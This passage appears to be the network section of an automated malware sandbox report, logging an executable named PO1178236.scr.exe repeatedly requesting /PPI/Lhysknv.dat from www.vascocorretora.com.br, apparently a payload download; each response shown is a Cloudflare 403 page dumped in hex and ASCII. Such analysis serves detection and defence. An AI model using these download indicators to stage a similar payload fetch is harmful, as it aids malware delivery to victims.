        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:15 UTC1369INData Raw: 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e
        Data Ascii: uired! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" con
        2025-01-09 07:36:15 UTC1369INData Raw: 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f
        Data Ascii: ss="cf-section cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </
        2025-01-09 07:36:15 UTC1369INData Raw: 63 65 6e 74 65 72 20 73 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 35 38 33 64 65 30 63 34 34 38 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72
        Data Ascii: center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1583de0c448</strong></span> <span class="cf-footer-separ
        2025-01-09 07:36:15 UTC1014INData Raw: 20 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 35 38 33 64 65 30 63 34 34 38 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 33 4e 53 34 77
        Data Ascii: <script> window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1583de0c448',t:'MTczNjQwODE3NS4w
        2025-01-09 07:36:15 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        32192.168.2.949740188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:15 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:16 UTC1005INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:16 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:31 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3qpjWKHMkKovM6JCL1vQ4uRWPuMtnPak1CBNENqgwaHNGT2KrlfCR33QdTSkYvvOwPZSUCzn0ataUOuzRijbKGqPuwiAD%2FDG0vp%2BABnEnZauQFcwKqn4zMFxv11ma%2FMEcPZL7Y8XkGN9ILfR"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c15c29b09e05-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2011&min_rtt=2008&rtt_var=760&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1433480&cwnd=242&unsent_bytes=0&cid=f6921e5fc1fa7e15&ts=142&x=0"
        2025-01-09 07:36:16 UTC364INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:16 UTC1369INData Raw: 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69
        Data Ascii: are</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=devi
        2025-01-09 07:36:16 UTC1369INData Raw: 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63
        Data Ascii: f-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captc
        2025-01-09 07:36:16 UTC1369INData Raw: 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 35 63 32 39 62 30 39 65 30 35 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e
        Data Ascii: eft border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c15c29b09e05</strong></span> <span class="cf-footer-separator sm:hidden">
        2025-01-09 07:36:16 UTC998INData Raw: 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 35 63 32 39 62 30 39 65 30 35 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 33 4e 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61
        Data Ascii: ow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c15c29b09e05',t:'MTczNjQwODE3Ni4wMDAwMDA='};var a
        2025-01-09 07:36:16 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        33192.168.2.949741188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:16 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:16 UTC1011INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:16 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:31 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QNWr%2BYbQ%2BZxI8NDt%2FWkK5uHc30ZALPtMIxlcnXiU4usanpsLe3tkvrBr4n7rCEOegW%2BWNcBDjEyXxTNyar9%2BoU9zK9WSRcYC4uIkj4m0FgZll1PdTY16eG%2BcDbEZwWRhJWGIfsJh6ftJ7bWr"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c15fe833436a-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1609&rtt_var=607&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1814791&cwnd=184&unsent_bytes=0&cid=ef141c0b9dfdb8e4&ts=136&x=0"
        2025-01-09 07:36:16 UTC358INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:16 UTC1369INData Raw: 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74
        Data Ascii: loudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="widt
        2025-01-09 07:36:16 UTC1369INData Raw: 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f
        Data Ascii: tion cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /
        2025-01-09 07:36:16 UTC1369INData Raw: 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 35 66 65 38 33 33 34 33 36 61 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69
        Data Ascii: text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c15fe833436a</strong></span> <span class="cf-footer-separator sm:hi
        2025-01-09 07:36:16 UTC1004INData Raw: 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 35 66 65 38 33 33 34 33 36 61 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 33 4e 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c15fe833436a',t:'MTczNjQwODE3Ni4wMDAwMDA='}
        2025-01-09 07:36:16 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        34192.168.2.949742188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:17 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:17 UTC1013INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:17 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:32 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hk6ljDkwraV22h%2F5%2B%2Fx8I2G3NxjLVgOo5Rx7pzFHVg1YWZNWD3swBAYWjaVe%2BYvVgJ134VOauBR8aQI3s%2Bjr1yraVOgE5Q4iKuhE0vpi5fl7j0Ib7ldylJLW7wqJuHjenLS%2B1giW%2F2pl32jA"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1638a3642b0-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1732&min_rtt=1729&rtt_var=654&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1665715&cwnd=233&unsent_bytes=0&cid=83490f2fb59149f3&ts=126&x=0"
        2025-01-09 07:36:17 UTC356INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:17 UTC1369INData Raw: 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
        Data Ascii: Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="wi
